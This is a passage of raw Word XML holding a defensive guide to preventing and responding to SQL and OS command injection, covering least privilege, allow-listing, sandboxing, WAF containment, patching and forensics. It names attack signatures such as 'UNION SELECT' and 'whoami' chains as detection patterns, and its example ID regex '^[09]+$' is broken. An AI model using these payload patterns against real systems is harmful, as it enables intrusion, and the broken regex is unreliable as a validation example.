        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>ProcessBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or Python's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>subprocess.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>(shell=False)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7CED5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>For Object Relational Mappers (ORMs):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rely on the ORM’s built-in query builders or object structures (e.g., Hibernate Criteria API or Entity Framework LINQ queries) rather than hand-crafting native string queries inside the framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6A21D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Architecture &amp; Design (Defense-in-Depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745F91E"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If an injection flaw slips through the code level, architectural controls should act as a safety net to minimize or completely block the exploit's capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1272D1C9"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The Principle of Least Privilege (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PoLP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D659"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Applications should connect to downstream interpreters using accounts that possess only the minimum necessary privileges required to function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9F55E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Database Layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application's database user profile should not have administrative or schema-altering privileges (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DBA</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If an application only needs to read product listings, its connection profile should explicitly be restricted to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions on that specific table, and completely barred from executing structural commands like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406D33F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Operating System Layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The web server or application process should never run under an administrative or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. Running the application within a low-privileged service account ensures that if an attacker achieves </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , their ability to modify system files, install malware, or pivot to neighboring servers is structurally contained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2BEED"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Strict Input Validation Layers (Allow-Listing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C355ED"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Applications must validate all incoming data at the server-side boundary before processing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4380B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Positive Validation (Allow-Listing):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Define exactly what is expected regarding data type, length, and character set (e.g., an ID parameter must strictly match a regex of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>^[09]+$</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the data violates these constraints, it is rejected immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6DAC2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Context-Aware Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If data must be rendered back to a user interface or sent to a distinct interpreter, it must pass through an encoding engine specific to that context (e.g., HTML entity encoding, URL encoding, or shell escaping) to neutralize hazardous characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323195E"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Isolation and Environment Sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249123A3"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 xml:space="preserve">Deploying applications within containerized, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>microsegmented</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments (such as Docker containers or isolated Kubernetes pods) limits the blast radius of an injection attack. Restricting outbound network access from the application container ensures that even if an attacker attempts an out-of-band injection or command execution, the server is blocked from initiating reverse shell connections back to the attacker's infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10DAAF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Incident Response &amp; Mitigation (If Already Exploited/Present)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A26DCC"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When an injection vulnerability moves from a theoretical risk to an active, exploited incident in a production environment, the response requires immediate tactical intervention followed by rigorous forensics and system rebuilding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B1FA0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Immediate Containment (Stopping the Bleeding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D901FC"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When an active attack is detected, the immediate priority is to neutralize the threat vector without destroying the evidence needed for later analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602DF79D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Emergency WAF Rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the attack signature is known (e.g., a specific payload pattern like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or OS command chains like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), immediately deploy virtual patches or custom regex rules on the Web Application Firewall (WAF) to drop matching inbound packets at the network edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E811E6C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Isolate the Impacted Subsystems:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the vulnerability is isolated to a specific microservice or application feature (such as a vulnerable report generation tool or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dynamic search bar), disable that specific endpoint or feature flag immediately to protect the rest of the application ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78EDA7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Revoke Database Sessions &amp; Credentials:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a database injection is underway, terminate the active database session pools tied to the compromised application tier. If administrative credentials or connection strings are suspected of being leaked, rotate them immediately across the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41E008" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Network Segregation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If OS Command Injection is suspected, isolate the affected application server at the network layer (e.g., updating security groups or VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C6DDE"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boundaries) to block the server from communicating out-of-band or establishing a reverse shell connection back to the attacker’s command-and-control server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FCB1F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Remediation and Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B302647"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Once the immediate threat is contained, the engineering team must transition to a permanent engineering fix to ensure the weakness is completely eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139263F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Code Refactoring (Parameterization):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify the exact data sink where the dynamic string construction occurred. Rewrite the code to use strict prepared statements, strict parameterized execution blocks, or migrate the database query layer completely into an ORM built-in abstraction framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287CF80F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardening Environment Variables:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove any legacy features that allow execution of arbitrary shell strings. Replace high-risk system functions with low-level native process calls that accept arguments explicitly as array components rather than mutable system strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4521A0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Regression and Automated Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before deploying the patch, write unit and integration test cases that intentionally attempt the exact exploitation payload used by the attacker. Verify that the system now rejects or safely treats the payload as benign data, and pass the updated code through the SAST pipeline for final clearance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027F096" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>3. Blast Radius Clean-Up &amp; Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57456ED3"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After closing the vulnerability, security operations must determine the extent of the compromise, hunt for persistent threats, and verify the integrity of the data assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB987AB"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Log Auditing &amp; Data Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71967DFD"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To determine exactly what the attacker accessed, security teams must cross-reference multiple log layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C4F11" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web Server Access Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check for abnormal HTTP response payloads, unusual URL query parameters, or spikes in outbound data sizes from the compromised endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17221845" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
